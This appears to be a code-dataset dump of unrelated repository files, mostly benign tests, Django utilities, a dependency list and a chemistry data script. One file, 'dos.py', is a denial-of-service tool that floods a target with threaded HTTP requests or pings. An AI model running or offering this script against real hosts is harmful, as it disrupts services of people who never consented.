'gen_list_ops.tensor_list_element_shape', (), '', False, 'from tensorflow.python.ops import gen_list_ops\n'), ((172, 20, 172, 65), 'tensorflow.python.framework.ops.convert_to_tensor', 'ops.convert_to_tensor', (), '', False, 'from tensorflow.python.framework import ops\n')] |
flaeppe/astunparse | tests/test_dump.py | 754ec7d113fa273625ccc7b6c5d65aa7700ab8a9 | import ast
import re
import sys
if sys.version_info < (2, 7):
import unittest2 as unittest
else:
import unittest
import astunparse
from tests.common import AstunparseCommonTestCase
class DumpTestCase(AstunparseCommonTestCase, unittest.TestCase):
def assertASTEqual(self, dump1, dump2):
# undo the pretty-printing
dump1 = re.sub(r"(?<=[\(\[])\n\s+", "", dump1)
dump1 = re.sub(r"\n\s+", " ", dump1)
self.assertEqual(dump1, dump2)
def check_roundtrip(self, code1, filename="internal", mode="exec"):
ast_ = compile(str(code1), filename, mode, ast.PyCF_ONLY_AST)
dump1 = astunparse.dump(ast_)
dump2 = ast.dump(ast_)
self.assertASTEqual(dump1, dump2)
| [((16, 16, 16, 54), 're.sub', 're.sub', ({(16, 23, 16, 42): '"""(?<=[\\\\(\\\\[])\\\\n\\\\s+"""', (16, 44, 16, 46): '""""""', (16, 48, 16, 53): 'dump1'}, {}), "('(?<=[\\\\(\\\\[])\\\\n\\\\s+', '', dump1)", False, 'import re\n'), ((17, 16, 17, 44), 're.sub', 're.sub', ({(17, 23, 17, 31): '"""\\\\n\\\\s+"""', (17, 33, 17, 36): '""" """', (17, 38, 17, 43): 'dump1'}, {}), "('\\\\n\\\\s+', ' ', dump1)", False, 'import re\n'), ((22, 16, 22, 37), 'astunparse.dump', 'astunparse.dump', ({(22, 32, 22, 36): 'ast_'}, {}), '(ast_)', False, 'import astunparse\n'), ((23, 16, 23, 30), 'ast.dump', 'ast.dump', ({(23, 25, 23, 29): 'ast_'}, {}), '(ast_)', False, 'import ast\n')] |
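A concrete illustration of the round-trip exercised by the test above, as a minimal sketch (assumes astunparse is installed; the snippet is not part of the test suite):

import ast
import astunparse

tree = ast.parse("x = [i * i for i in range(3)]")
pretty = astunparse.dump(tree)   # indented, multi-line dump
flat = ast.dump(tree)            # single-line reference dump
# assertASTEqual collapses the indentation added in `pretty` before comparing it with `flat`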
addgene/giraffe | src/django/giraffe/blat/management/commands/reset_app.py | c7d3b1f000ceea83e6c98cce06cd2a0f9e4f4c2c | from django.core.management.base import AppCommand, CommandError
from django.core.management.sql import sql_reset
from django.core.management.color import no_style
from django.db import connections
class Command(AppCommand):
help = "**********\nThis command resets data for any django app, the difference with the built-in command\n\n '$ python manage.py reset <app_name>'\n\nis that when a sql statement fails, it jumps to the next statement generated by command\n\n '$ python manage.py sqlreset <app_name>'\n\nUseful when the original reset fail when droping CONSTRAINTS\n**********"
output_transaction = True
def handle_app(self, app, **options):
connection = connections['default']
self.style = no_style()
custom_reset_statements = sql_reset(app, self.style, connection)
cursor = connection.cursor()
def execute_sqlreset():
failed_statements = []
for sql in custom_reset_statements:
print 'statement>>>> ' + sql
try:
cursor.execute(sql)
except Exception,e:
if e[0] == 1025:
failed_statements.append(sql)
if failed_statements:
print "These statements failed: "
for s in failed_statements:
print s
execute_sqlreset()
| [] |
JordanBRoberts/python-theBand | webBlog/apps.py | 1e475a45a42b210c722ab43c0b966d7b58d97a9d | from django.apps import AppConfig
class WebblogConfig(AppConfig):
name = 'webBlog'
| [] |
lydaaa/fzutils | requires.py | 5f775d046876e3ce35d0b1174b5a3db96e9d627e | # coding:utf-8
'''
@author = super_fazai
@File : requires.py
@Time : 2016/8/3 12:59
@connect : [email protected]
'''
install_requires = [
'ipython',
'wheel',
'utils',
'db',
'greenlet==0.4.13',
'web.py==0.40.dev1',
'pytz',
'requests',
    'selenium==3.8.0',  # versions 3.8.1 and above no longer support phantomjs
'asyncio',
'psutil',
'pyexecjs',
'setuptools',
'colorama',
'twine',
'numpy',
'pprint',
'selenium',
'chardet',
'bs4',
'scrapy',
'demjson',
'pymssql',
'sqlalchemy',
'gevent',
'aiohttp',
'celery',
'jsonpath',
'matplotlib',
'wget',
'flask',
'flask_login',
    'mitmproxy',        # shell packet-capture proxy
'pymongo',
'pyexcel',
'pyexcel-xlsx',
'fabric',
'shadowsocks',
# 'pycurl==7.43.0.1',
'furl',
'yarl',
'prettytable',
'xlrd',
'pandas',
'jieba',
'geopandas',
'scikit-image',
    'wordcloud',        # word cloud
'pygame',
] | [] |
venkatarjun/Python3 | m15_dos/dos.py | 606adf8588a74a53d592e62e07e81a5a1530b993 | import subprocess
import requests
import argparse
from concurrent.futures import ThreadPoolExecutor
from time import sleep
from datetime import datetime
ICMP_ATTACK = "ICMP"
HTTP_ATTACK = "HTTP"
valid_attacks = {HTTP_ATTACK, ICMP_ATTACK}
parser = argparse.ArgumentParser(description="DoS HTTP")
parser.add_argument('-P', '--poolsize', default=10, help='Size of the threadpool')
parser.add_argument('-T', '--target', default='localhost', help='Target URL for http request')
parser.add_argument('-D', '--delay', default=0, help='Amount of time to wait between requests')
parser.add_argument('-A', '--attack', help='Type of attack (e.g. HTTP, ICMP)')
args = parser.parse_args()
threadpool_size = int(args.poolsize)
target = args.target
delay = int(args.delay)
attack = args.attack.upper()
if attack not in valid_attacks:
print(f"Invalid attack type, must be one of: {valid_attacks}")
exit()
terminate = False
def http_request(url):
global terminate
    while not terminate:
response = requests.get(url)
if not response.ok:
print(f"{str(datetime.now())[:-3]} !!! HTTP request failed, code: {response.status_code}")
else:
print(f"{str(datetime.now())[:-3]} ---> HTTP request successful")
if delay > 0:
for _ in range(0, delay): sleep(1)
print("...http_request thread terminated")
def ping_host(ip):
global terminate
    while not terminate:
try:
subprocess.check_output(["ping", "-c3", "-n", "-i0.5", "-W2", ip])
print(f"{str(datetime.now())[:-3]} ---> Ping successful: {ip}")
except subprocess.CalledProcessError:
print(f"{str(datetime.now())[:-3]} !!! Ping failed: {ip}")
if delay > 0:
for _ in range(0, delay): sleep(1)
def main():
global terminate
try:
targets = [target for _ in range(0, threadpool_size)]
with ThreadPoolExecutor(max_workers=threadpool_size) as executor:
if attack == HTTP_ATTACK:
executor.map(http_request, targets)
elif attack == ICMP_ATTACK:
executor.map(ping_host, targets)
else:
return # should not have gotten here
except KeyboardInterrupt:
print("... terminating application ...", end="")
terminate = True
print("terminated")
if __name__ == "__main__":
main()
| [((12, 9, 12, 56), 'argparse.ArgumentParser', 'argparse.ArgumentParser', (), '', False, 'import argparse\n'), ((38, 19, 38, 36), 'requests.get', 'requests.get', ({(38, 32, 38, 35): 'url'}, {}), '(url)', False, 'import requests\n'), ((57, 12, 57, 78), 'subprocess.check_output', 'subprocess.check_output', ({(57, 36, 57, 77): "['ping', '-c3', '-n', '-i0.5', '-W2', ip]"}, {}), "(['ping', '-c3', '-n', '-i0.5', '-W2', ip])", False, 'import subprocess\n'), ((73, 13, 73, 60), 'concurrent.futures.ThreadPoolExecutor', 'ThreadPoolExecutor', (), '', False, 'from concurrent.futures import ThreadPoolExecutor\n'), ((45, 38, 45, 46), 'time.sleep', 'sleep', ({(45, 44, 45, 45): '(1)'}, {}), '(1)', False, 'from time import sleep\n'), ((64, 38, 64, 46), 'time.sleep', 'sleep', ({(64, 44, 64, 45): '(1)'}, {}), '(1)', False, 'from time import sleep\n'), ((40, 25, 40, 39), 'datetime.datetime.now', 'datetime.now', ({}, {}), '()', False, 'from datetime import datetime\n'), ((42, 25, 42, 39), 'datetime.datetime.now', 'datetime.now', ({}, {}), '()', False, 'from datetime import datetime\n'), ((58, 25, 58, 39), 'datetime.datetime.now', 'datetime.now', ({}, {}), '()', False, 'from datetime import datetime\n'), ((61, 25, 61, 39), 'datetime.datetime.now', 'datetime.now', ({}, {}), '()', False, 'from datetime import datetime\n')] |
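The script above fans one target out to every slot of a thread pool and lets each worker loop until interrupted. A minimal sketch of just that fan-out pattern, with the worker body and pool size as placeholders rather than values from the script:

from concurrent.futures import ThreadPoolExecutor

def worker(target):
    # stand-in for the http_request / ping_host loops
    return f"done: {target}"

with ThreadPoolExecutor(max_workers=4) as pool:
    results = list(pool.map(worker, ["localhost"] * 4))
print(results)  # four 'done: localhost' entries, one per pool slot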
estudio89/maestro-python | maestro/backends/django/contrib/signals.py | 331079cb3f0c10de2e19210cbade793544510f33 | from django.apps import apps
from django.db import models
from django.db.models.signals import post_save, pre_delete
from typing import Type, Optional, List, cast, TYPE_CHECKING
from maestro.backends.django.settings import maestro_settings
from maestro.backends.django.contrib.factory import create_django_data_store
from maestro.backends.django.utils import model_to_entity_name
from maestro.core.metadata import Operation
from .middleware import _add_operation_to_queue
import copy
if TYPE_CHECKING:
from maestro.backends.django import DjangoDataStore
def model_saved_signal(
sender: "Type[models.Model]",
instance: "models.Model",
created: "bool",
raw: "bool",
using: "str",
update_fields: "Optional[List[str]]",
**kwargs,
):
operation: "Operation"
if created:
operation = Operation.INSERT
else:
operation = Operation.UPDATE
data_store: "DjangoDataStore" = create_django_data_store()
entity_name = model_to_entity_name(instance)
data_store.commit_item_change(
operation=operation,
entity_name=entity_name,
item_id=str(instance.pk),
item=copy.deepcopy(instance),
execute_operation=False,
)
_add_operation_to_queue(operation=operation, item=copy.deepcopy(instance))
def model_pre_delete_signal(
sender: "Type[models.Model]", instance: "models.Model", using: "str", **kwargs
):
data_store: "DjangoDataStore" = create_django_data_store()
entity_name = model_to_entity_name(instance)
data_store.commit_item_change(
operation=Operation.DELETE,
entity_name=entity_name,
item_id=str(instance.pk),
item=copy.deepcopy(instance),
execute_operation=False,
)
_add_operation_to_queue(operation=Operation.DELETE, item=copy.deepcopy(instance))
def _connect_signal(model: "models.Model"):
full_label = (
cast("str", model._meta.app_label) + "_" + cast("str", model._meta.model_name)
)
post_save.connect(
receiver=model_saved_signal,
sender=model,
dispatch_uid=full_label + "_update_sync",
)
pre_delete.connect(
receiver=model_pre_delete_signal,
sender=model,
dispatch_uid=full_label + "_delete_sync",
)
def connect_signals():
for app_model in maestro_settings.MODELS:
model = apps.get_model(app_model)
_connect_signal(model=model)
def _disconnect_signal(model: "models.Model"):
full_label = (
cast("str", model._meta.app_label) + "_" + cast("str", model._meta.model_name)
)
post_save.disconnect(
receiver=model_saved_signal,
sender=model,
dispatch_uid=full_label + "_update_sync",
)
pre_delete.disconnect(
receiver=model_pre_delete_signal,
sender=model,
dispatch_uid=full_label + "_delete_sync",
)
class _DisableSignalsContext:
def __init__(self, model: "Type[models.Model]"):
self.model = model
def __enter__(self):
_disconnect_signal(model=self.model)
def __exit__(self, type, value, traceback):
label = self.model._meta.app_label + "." + self.model._meta.model_name
enabled_models = [label.lower() for label in maestro_settings.MODELS]
if label in enabled_models:
_connect_signal(model=self.model)
def temporarily_disable_signals(model: "Type[models.Model]"):
return _DisableSignalsContext(model=model)
| [((31, 36, 31, 62), 'maestro.backends.django.contrib.factory.create_django_data_store', 'create_django_data_store', ({}, {}), '()', False, 'from maestro.backends.django.contrib.factory import create_django_data_store\n'), ((32, 18, 32, 48), 'maestro.backends.django.utils.model_to_entity_name', 'model_to_entity_name', ({(32, 39, 32, 47): 'instance'}, {}), '(instance)', False, 'from maestro.backends.django.utils import model_to_entity_name\n'), ((47, 36, 47, 62), 'maestro.backends.django.contrib.factory.create_django_data_store', 'create_django_data_store', ({}, {}), '()', False, 'from maestro.backends.django.contrib.factory import create_django_data_store\n'), ((48, 18, 48, 48), 'maestro.backends.django.utils.model_to_entity_name', 'model_to_entity_name', ({(48, 39, 48, 47): 'instance'}, {}), '(instance)', False, 'from maestro.backends.django.utils import model_to_entity_name\n'), ((63, 4, 67, 5), 'django.db.models.signals.post_save.connect', 'post_save.connect', (), '', False, 'from django.db.models.signals import post_save, pre_delete\n'), ((69, 4, 73, 5), 'django.db.models.signals.pre_delete.connect', 'pre_delete.connect', (), '', False, 'from django.db.models.signals import post_save, pre_delete\n'), ((86, 4, 90, 5), 'django.db.models.signals.post_save.disconnect', 'post_save.disconnect', (), '', False, 'from django.db.models.signals import post_save, pre_delete\n'), ((91, 4, 95, 5), 'django.db.models.signals.pre_delete.disconnect', 'pre_delete.disconnect', (), '', False, 'from django.db.models.signals import post_save, pre_delete\n'), ((61, 51, 61, 86), 'typing.cast', 'cast', ({(61, 56, 61, 61): '"""str"""', (61, 63, 61, 85): 'model._meta.model_name'}, {}), "('str', model._meta.model_name)", False, 'from typing import Type, Optional, List, cast, TYPE_CHECKING\n'), ((78, 16, 78, 41), 'django.apps.apps.get_model', 'apps.get_model', ({(78, 31, 78, 40): 'app_model'}, {}), '(app_model)', False, 'from django.apps import apps\n'), ((84, 51, 84, 86), 'typing.cast', 'cast', ({(84, 56, 84, 61): '"""str"""', (84, 63, 84, 85): 'model._meta.model_name'}, {}), "('str', model._meta.model_name)", False, 'from typing import Type, Optional, List, cast, TYPE_CHECKING\n'), ((37, 13, 37, 36), 'copy.deepcopy', 'copy.deepcopy', ({(37, 27, 37, 35): 'instance'}, {}), '(instance)', False, 'import copy\n'), ((40, 54, 40, 77), 'copy.deepcopy', 'copy.deepcopy', ({(40, 68, 40, 76): 'instance'}, {}), '(instance)', False, 'import copy\n'), ((53, 13, 53, 36), 'copy.deepcopy', 'copy.deepcopy', ({(53, 27, 53, 35): 'instance'}, {}), '(instance)', False, 'import copy\n'), ((56, 61, 56, 84), 'copy.deepcopy', 'copy.deepcopy', ({(56, 75, 56, 83): 'instance'}, {}), '(instance)', False, 'import copy\n'), ((61, 8, 61, 42), 'typing.cast', 'cast', ({(61, 13, 61, 18): '"""str"""', (61, 20, 61, 41): 'model._meta.app_label'}, {}), "('str', model._meta.app_label)", False, 'from typing import Type, Optional, List, cast, TYPE_CHECKING\n'), ((84, 8, 84, 42), 'typing.cast', 'cast', ({(84, 13, 84, 18): '"""str"""', (84, 20, 84, 41): 'model._meta.app_label'}, {}), "('str', model._meta.app_label)", False, 'from typing import Type, Optional, List, cast, TYPE_CHECKING\n')] |
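A sketch of how the hooks above are meant to be used; SomeModel is a made-up model assumed to be listed in maestro_settings.MODELS:

from maestro.backends.django.contrib.signals import (
    connect_signals, temporarily_disable_signals)

connect_signals()  # wire post_save/pre_delete for every configured model
with temporarily_disable_signals(SomeModel):
    SomeModel.objects.create(name="imported")  # saved without queueing a sync operation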
pbexe/nextbike-top | top/urls.py | eca086406cf6b96d6e086dd0fa9ecae5b6364f4d | from django.urls import include, path
from .views import home, bike
urlpatterns = [
path("", home),
path("bike/<int:number>", bike)
] | [((5, 4, 5, 18), 'django.urls.path', 'path', ({(5, 9, 5, 11): '""""""', (5, 13, 5, 17): 'home'}, {}), "('', home)", False, 'from django.urls import include, path\n'), ((6, 4, 6, 35), 'django.urls.path', 'path', ({(6, 9, 6, 28): '"""bike/<int:number>"""', (6, 30, 6, 34): 'bike'}, {}), "('bike/<int:number>', bike)", False, 'from django.urls import include, path\n')] |
mike72353/FragFeatureNet | Scripts/ReduceFragments.py | ef61ae52e3d6dcc6d2d56df2a6bd5fe1a298c930 | """
Remove Fragments not in Knowledgebase
"""
__author__ = "Michael Suarez"
__email__ = "[email protected]"
__copyright__ = "Copyright 2019, Hong Kong University of Science and Technology"
__license__ = "3-clause BSD"
from argparse import ArgumentParser
import numpy as np
import pickle
parser = ArgumentParser(description="Build Files")
parser.add_argument("--datadir", type=str, default="Data", help="input - XXX.YYY ")
parser.add_argument("--envNewAcronym", type=str, default="PRT.SNW", help="input - XXX.YYY ")
args = parser.parse_args()
# Check the Bound Fragments
BoundFrags = np.loadtxt("../%s/%s/%s.Homogenised.boundfrags_zeros.txt" %(args.datadir, args.envNewAcronym, args.envNewAcronym), delimiter=',')
normalDF = pickle.load(open("../%s/GrandCID.dict" %(args.datadir), "rb"))
binding = np.full(BoundFrags.shape,-1)
mlength = 0
for r, i in enumerate(BoundFrags):
for c, j in enumerate(i[i!=0]):
try:
# Checks whether the Fragment can be found in the 59k Fragment Base
binding[r,c]=normalDF.index.get_loc(int(j))
except:
continue
temp = binding[r]
if temp[temp!=-1].shape[0] > mlength:
mlength = temp[temp!=-1].shape[0]
print(mlength) #Finds the maximum number of Fragments per environment -> 705
indices = np.empty(binding.shape[0])
red_binding = np.full((binding.shape[0], mlength), -1)
for j, i in enumerate(binding):
indices[j] = i[i!=-1].shape[0]
red_binding[j][:int(indices[j])] = i[i!=-1]
red_binding = np.delete(red_binding, np.where(indices==0), axis=0)
pickle.dump(red_binding, open("../%s/%s/%s.binding.mtr" %(args.datadir, args.envNewAcronym, args.envNewAcronym), "wb"))
# Removes environments without binding Fragments
Features_all = pickle.load(open("../%s/%s/%s.Homogenised.property.pvar" %(args.datadir, args.envNewAcronym, args.envNewAcronym), "rb"))
Features_all = np.delete(Features_all, np.where(indices==0), axis=0)
pickle.dump(Features_all, open("../%s/%s/%s.Homogenised.property.pvar" %(args.datadir, args.envNewAcronym, args.envNewAcronym), "wb"))
# Removes environment annotation without binding fragments
with open("../%s/%s/%s.Homogenised.annotation.txt" %(args.datadir, args.envNewAcronym, args.envNewAcronym), "r+") as f:
lines = f.readlines()
for i in np.where(indices==0)[0][::-1]:
del lines[i]
f.seek(0)
f.truncate()
f.writelines(lines)
| [((14, 9, 14, 50), 'argparse.ArgumentParser', 'ArgumentParser', (), '', False, 'from argparse import ArgumentParser\n'), ((23, 13, 23, 142), 'numpy.loadtxt', 'np.loadtxt', (), '', True, 'import numpy as np\n'), ((27, 10, 27, 38), 'numpy.full', 'np.full', ({(27, 18, 27, 34): 'BoundFrags.shape', (27, 35, 27, 37): '-1'}, {}), '(BoundFrags.shape, -1)', True, 'import numpy as np\n'), ((41, 10, 41, 36), 'numpy.empty', 'np.empty', ({(41, 19, 41, 35): 'binding.shape[0]'}, {}), '(binding.shape[0])', True, 'import numpy as np\n'), ((42, 14, 42, 54), 'numpy.full', 'np.full', ({(42, 22, 42, 49): '(binding.shape[0], mlength)', (42, 51, 42, 53): '-1'}, {}), '((binding.shape[0], mlength), -1)', True, 'import numpy as np\n'), ((46, 37, 46, 57), 'numpy.where', 'np.where', ({(46, 46, 46, 56): 'indices == 0'}, {}), '(indices == 0)', True, 'import numpy as np\n'), ((52, 39, 52, 59), 'numpy.where', 'np.where', ({(52, 48, 52, 58): 'indices == 0'}, {}), '(indices == 0)', True, 'import numpy as np\n'), ((58, 13, 58, 33), 'numpy.where', 'np.where', ({(58, 22, 58, 32): '(indices == 0)'}, {}), '(indices == 0)', True, 'import numpy as np\n')] |
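The re-packing step above (drop the -1 padding, rebuild a matrix just wide enough for the longest row, and discard empty environments) can be illustrated on a toy array; the numbers are made up:

import numpy as np

binding = np.array([[3, -1, -1], [5, 7, -1], [-1, -1, -1]])
lengths = (binding != -1).sum(axis=1)                    # fragments per environment
packed = np.full((binding.shape[0], lengths.max()), -1)
for row, vals in enumerate(binding):
    packed[row, :lengths[row]] = vals[vals != -1]
packed = np.delete(packed, np.where(lengths == 0)[0], axis=0)
# packed is now [[3, -1], [5, 7]]; the all-padding row is gone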
vbohinc/CommunityCellularManager | client/core/tests/billing_tests.py | ab330fcb1bc70ee3a8e9bcdac2846ab6c327f87c | """Tests for core.billing.
Run this test from the project root
$ nosetests core.tests.billing_tests
Copyright (c) 2016-present, Facebook, Inc.
All rights reserved.
This source code is licensed under the BSD-style license found in the
LICENSE file in the root directory of this source tree. An additional grant
of patent rights can be found in the PATENTS file in the same directory.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import unittest
import random
import math
from core.billing import get_call_cost
from core.billing import get_prefix_from_number
from core.billing import get_sms_cost
from core.billing import process_prices
from core.billing import round_to_billable_unit
from core.billing import round_up_to_nearest_100
from core import config_database
TARIFF = 100
class GetCostTest(unittest.TestCase):
"""Testing core.billing.get_call_cost."""
@classmethod
def setUpClass(cls):
# Setup the config db.
cls.config_db = config_database.ConfigDB()
cls.config_db['bts_secret'] = 'hokay'
cls.config_db['free_seconds'] = '5'
cls.config_db['billable_unit'] = '1'
# Setup some price data like what would be sent back from the cloud.
price_data = [
{
'directionality': 'off_network_send',
'prefix': '509',
'country_name': 'Haiti',
'country_code': 'HT',
'cost_to_subscriber_per_sms': 900,
'cost_to_subscriber_per_min': 1100,
'billable_unit': 1,
}, {
'directionality': 'off_network_send',
'prefix': '56',
'country_name': 'Chile',
'country_code': 'CL',
'cost_to_subscriber_per_sms': 1000,
'cost_to_subscriber_per_min': 800,
'billable_unit': 1,
}, {
'directionality': 'off_network_send',
'prefix': '63',
'country_name': 'Philippines',
'country_code': 'PH',
'cost_to_subscriber_per_sms': 100,
'cost_to_subscriber_per_min': 600,
'billable_unit': 30,
}, {
'directionality': 'off_network_receive',
'cost_to_subscriber_per_sms': 200,
'cost_to_subscriber_per_min': 100,
'billable_unit': 1,
}, {
'directionality': 'on_network_send',
'cost_to_subscriber_per_sms': 400,
'cost_to_subscriber_per_min': 300,
'billable_unit': 1,
}, {
'directionality': 'on_network_receive',
'cost_to_subscriber_per_sms': 500,
'cost_to_subscriber_per_min': 200,
'billable_unit': 1,
}
]
# Populate the config db with prices
process_prices(price_data, cls.config_db)
def test_on_receive_call(self):
"""We can get the subscriber price for an on-network received call."""
billable_seconds = 170
# Recall that the expected cost is rounded to the nearest value of 100.
expected_cost = 600
self.assertEqual(expected_cost,
get_call_cost(billable_seconds, 'on_network_receive'))
def test_on_receive_sms(self):
"""We can get the subscriber price for an on-network received SMS."""
expected_cost = 500
self.assertEqual(expected_cost, get_sms_cost('on_network_receive'))
def test_off_receive_call(self):
"""We can get the subscriber price for an off-network received call."""
billable_seconds = 700
expected_cost = 1200
self.assertEqual(
expected_cost,
get_call_cost(billable_seconds, 'off_network_receive'))
def test_off_receive_sms(self):
"""We can get the subscriber price for an off-network received SMS."""
expected_cost = 200
self.assertEqual(expected_cost, get_sms_cost('off_network_receive'))
def test_on_send_call(self):
"""We can get the subscriber price for an on-network sent call."""
billable_seconds = 190
expected_cost = 1000
self.assertEqual(expected_cost,
get_call_cost(billable_seconds, 'on_network_send'))
def test_on_send_sms(self):
"""We can get the subscriber price for an on-network sent SMS."""
expected_cost = 400
self.assertEqual(expected_cost, get_sms_cost('on_network_send'))
def test_call_to_chile(self):
"""We can get the cost of a call to Chile."""
billable_seconds = 830
expected_cost = 11000
number = ''.join(['56', '1235554567'])
actual_cost = get_call_cost(billable_seconds, 'off_network_send',
destination_number=number)
self.assertEqual(expected_cost, actual_cost)
def test_sms_to_chile(self):
"""We can get the price to a subscriber of an SMS sent to Chile."""
expected_cost = 1000
number = ''.join(['56', '1235554567'])
actual_cost = get_sms_cost('off_network_send',
destination_number=number)
self.assertEqual(expected_cost, actual_cost)
def test_call_to_ph(self):
""" We bill for calls to PH correctly. """
billable_seconds = 70
expected_cost = 900
number = ''.join(['63', '5551234567'])
actual_cost = get_call_cost(billable_seconds, 'off_network_send',
destination_number=number)
self.assertEqual(expected_cost, actual_cost)
def test_nonexistent_prefix(self):
"""If the prefix doesn't exist, it's free.
The prefix price key might not exist if, say, the billing tier data
has not yet been loaded.
"""
expected_cost = 0
number = ''.join(['9999', '1235554567'])
actual_cost = get_sms_cost('off_network_send',
destination_number=number)
self.assertEqual(expected_cost, actual_cost)
class GetPrefixFromNumberTest(unittest.TestCase):
"""Testing core.billing.get_prefix_from_number."""
@classmethod
def setUpClass(cls):
# Setup the config db.
cls.config_db = config_database.ConfigDB()
cls.config_db['bts_secret'] = 'yup'
# Load up some pricing data into the config db. We use this data to
# determine what prefixes are available.
# 2015dec9(shasan): This is a legacy billing response, lacking billable
# units. This also tests we can handle that case.
price_data = [
{
'directionality': 'off_network_send',
'prefix': '789',
                'country_name': 'Oceania',
'country_code': 'OC',
'cost_to_subscriber_per_sms': 300,
'cost_to_subscriber_per_min': 20,
}, {
'directionality': 'off_network_send',
'prefix': '78',
'country_name': 'Eurasia',
'country_code': 'EU',
'cost_to_subscriber_per_sms': 400,
'cost_to_subscriber_per_min': 10,
}, {
'directionality': 'off_network_send',
'prefix': '7',
'country_name': 'Eastasia',
'country_code': 'EA',
'cost_to_subscriber_per_sms': 500,
'cost_to_subscriber_per_min': 30,
}, {
'directionality': 'off_network_send',
'prefix': '3',
'country_name': 'London',
'country_code': 'LN',
'cost_to_subscriber_per_sms': 5000,
'cost_to_subscriber_per_min': 3000,
}
]
# Populate the config db with prices
process_prices(price_data, cls.config_db)
def test_get_one_digit_prefix(self):
"""We can get a one digit prefix."""
number = ''.join(['7', '1235557890'])
self.assertEqual('7', get_prefix_from_number(number))
def test_get_two_digit_prefix(self):
"""We can get a two digit prefix."""
number = ''.join(['78', '1235557890'])
self.assertEqual('78', get_prefix_from_number(number))
def test_get_three_digit_prefix(self):
"""We can get a three digit prefix."""
number = ''.join(['789', '1235557890'])
self.assertEqual('789', get_prefix_from_number(number))
def test_get_one_digit_uncommon_prefix(self):
"""We can get a one digit uncommon prefix."""
number = ''.join(['3', '1235557890'])
self.assertEqual('3', get_prefix_from_number(number))
class RoundCostToBillableUnit(unittest.TestCase):
"""Testing core.billing.round_to_billable_unit."""
def test_billable_unit_rounding_sans_free_seconds(self):
for i in range(100):
billsec = random.randint(1, 5000)
expected_cost = int(billsec * (TARIFF / 60.0))
print('%s seconds should cost %s' % (billsec, expected_cost))
self.assertEqual(expected_cost,
round_to_billable_unit(billsec, TARIFF))
def test_billable_unit_rounding_with_free_seconds(self):
for i in range(100):
billsec = random.randint(100, 5000)
free = random.randint(1, 100)
expected_cost = int((billsec - free) * (TARIFF / 60.0))
print('%s seconds with %s free should cost %s' %
(billsec, free, expected_cost))
self.assertEqual(expected_cost,
round_to_billable_unit(billsec, TARIFF, free))
    def test_billable_unit_rounding_with_units(self):
        """Test the "rows" of this table: (billsec, rate, free, unit, expected_cost)."""
tests = [
# base case
(0, 60, 0, 30, 0),
# call too short
(5, 60, 0, 30, 30),
# changing the units
(5, 60, 0, 60, 60),
# call slightly too long
(61, 60, 0, 60, 120),
# weird non-uniform per minute
(61, 72, 0, 30, 108),
# including free seconds
(61, 60, 10, 60, 60)
]
for test in tests:
billsec = test[0]
rate = test[1]
free = test[2]
unit = test[3]
expected_cost = test[4]
actual_cost = round_to_billable_unit(billsec, rate, free, unit)
print('%s sec with %s free and a unit of %s sec '
'expected cost %s, actual cost %s' %
(billsec, free, unit, expected_cost, actual_cost))
self.assertEqual(expected_cost, actual_cost)
class RoundCostUpToNearest100(unittest.TestCase):
"""Testing core.billing.round_up_to_nearest_100."""
def test_round_negatives(self):
# test negatives
for i in [-10000, -100, -1]:
self.assertEqual(0, round_up_to_nearest_100(i))
def test_round_positives(self):
for i in range(0, 5000):
self.assertEqual(int(math.ceil(i / float(100))) * 100,
round_up_to_nearest_100(i))
| [((40, 24, 40, 50), 'core.config_database.ConfigDB', 'config_database.ConfigDB', ({}, {}), '()', False, 'from core import config_database\n'), ((88, 8, 88, 49), 'core.billing.process_prices', 'process_prices', ({(88, 23, 88, 33): 'price_data', (88, 35, 88, 48): 'cls.config_db'}, {}), '(price_data, cls.config_db)', False, 'from core.billing import process_prices\n'), ((133, 22, 134, 62), 'core.billing.get_call_cost', 'get_call_cost', (), '', False, 'from core.billing import get_call_cost\n'), ((141, 22, 142, 61), 'core.billing.get_sms_cost', 'get_sms_cost', (), '', False, 'from core.billing import get_sms_cost\n'), ((150, 22, 151, 62), 'core.billing.get_call_cost', 'get_call_cost', (), '', False, 'from core.billing import get_call_cost\n'), ((162, 22, 163, 61), 'core.billing.get_sms_cost', 'get_sms_cost', (), '', False, 'from core.billing import get_sms_cost\n'), ((172, 24, 172, 50), 'core.config_database.ConfigDB', 'config_database.ConfigDB', ({}, {}), '()', False, 'from core import config_database\n'), ((210, 8, 210, 49), 'core.billing.process_prices', 'process_prices', ({(210, 23, 210, 33): 'price_data', (210, 35, 210, 48): 'cls.config_db'}, {}), '(price_data, cls.config_db)', False, 'from core.billing import process_prices\n'), ((96, 25, 96, 78), 'core.billing.get_call_cost', 'get_call_cost', ({(96, 39, 96, 55): 'billable_seconds', (96, 57, 96, 77): '"""on_network_receive"""'}, {}), "(billable_seconds, 'on_network_receive')", False, 'from core.billing import get_call_cost\n'), ((101, 40, 101, 74), 'core.billing.get_sms_cost', 'get_sms_cost', ({(101, 53, 101, 73): '"""on_network_receive"""'}, {}), "('on_network_receive')", False, 'from core.billing import get_sms_cost\n'), ((109, 12, 109, 66), 'core.billing.get_call_cost', 'get_call_cost', ({(109, 26, 109, 42): 'billable_seconds', (109, 44, 109, 65): '"""off_network_receive"""'}, {}), "(billable_seconds, 'off_network_receive')", False, 'from core.billing import get_call_cost\n'), ((114, 40, 114, 75), 'core.billing.get_sms_cost', 'get_sms_cost', ({(114, 53, 114, 74): '"""off_network_receive"""'}, {}), "('off_network_receive')", False, 'from core.billing import get_sms_cost\n'), ((121, 25, 121, 75), 'core.billing.get_call_cost', 'get_call_cost', ({(121, 39, 121, 55): 'billable_seconds', (121, 57, 121, 74): '"""on_network_send"""'}, {}), "(billable_seconds, 'on_network_send')", False, 'from core.billing import get_call_cost\n'), ((126, 40, 126, 71), 'core.billing.get_sms_cost', 'get_sms_cost', ({(126, 53, 126, 70): '"""on_network_send"""'}, {}), "('on_network_send')", False, 'from core.billing import get_sms_cost\n'), ((215, 30, 215, 60), 'core.billing.get_prefix_from_number', 'get_prefix_from_number', ({(215, 53, 215, 59): 'number'}, {}), '(number)', False, 'from core.billing import get_prefix_from_number\n'), ((220, 31, 220, 61), 'core.billing.get_prefix_from_number', 'get_prefix_from_number', ({(220, 54, 220, 60): 'number'}, {}), '(number)', False, 'from core.billing import get_prefix_from_number\n'), ((225, 32, 225, 62), 'core.billing.get_prefix_from_number', 'get_prefix_from_number', ({(225, 55, 225, 61): 'number'}, {}), '(number)', False, 'from core.billing import get_prefix_from_number\n'), ((230, 30, 230, 60), 'core.billing.get_prefix_from_number', 'get_prefix_from_number', ({(230, 53, 